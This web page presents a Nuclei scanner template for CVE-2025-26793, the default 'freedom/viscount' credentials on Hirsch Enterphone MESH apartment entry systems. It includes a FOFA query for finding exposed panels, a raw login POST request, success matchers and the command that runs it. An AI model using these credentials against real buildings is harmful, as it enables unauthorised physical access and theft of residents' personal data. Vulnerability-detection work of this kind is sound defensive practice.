Skip to content

FREEDOM Administration - Default Login

ID: CVE-2025-26793

Severity: critical

Author: Eric Daigle,DhiyaneshDK

Tags: cve,cve2025,freedom,admin,mesh

The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents’ PII. NOTE- the Supplier’s perspective is that the “vulnerable systems are not following manufacturers’ recommendations to change the default password.”

id: CVE-2025-26793
info:
name: FREEDOM Administration - Default Login
author: Eric Daigle,DhiyaneshDK
severity: critical
description: |
The Web GUI configuration panel of Hirsch (formerly Identiv and Viscount) Enterphone MESH through 2024 ships with default credentials (username freedom, password viscount). The administrator is not prompted to change these credentials on initial configuration, and changing the credentials requires many steps. Attackers can use the credentials over the Internet via mesh.webadmin.MESHAdminServlet to gain access to dozens of Canadian and U.S. apartment buildings and obtain building residents' PII. NOTE- the Supplier's perspective is that the "vulnerable systems are not following manufacturers' recommendations to change the default password."
reference:
- https://www.ericdaigle.ca/posts/breaking-into-dozens-of-apartments-in-five-minutes/
- https://news.ycombinator.com/item?id=43160884
- https://support.identiv.com/products/physical-access/hirsch/
classification:
epss-score: 0.00045
epss-percentile: 0.18319
metadata:
verified: true
max-request: 1
fofa-query: title="FREEDOM Administration"
tags: cve,cve2025,freedom,admin,mesh
variables:
username: "freedom"
password: "viscount"
http:
- raw:
- |
POST /mesh/servlet/mesh.webadmin.MESHAdminServlet?requestedAction=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
formLoginName={{username}}&formLoginPassword={{password}}
redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Administration: Controlled Areas"
- "Log Out"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100bffe5041303ee9a8b79d5266d2c1c44ec087ca06f6a8120b795d55ae12ea987c022100afa10fb52fc3a3d8c9094fa27610c6e8a60b6c4586d26cc5fe2a8efbd4c4a36f:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-26793.yaml"

View on Github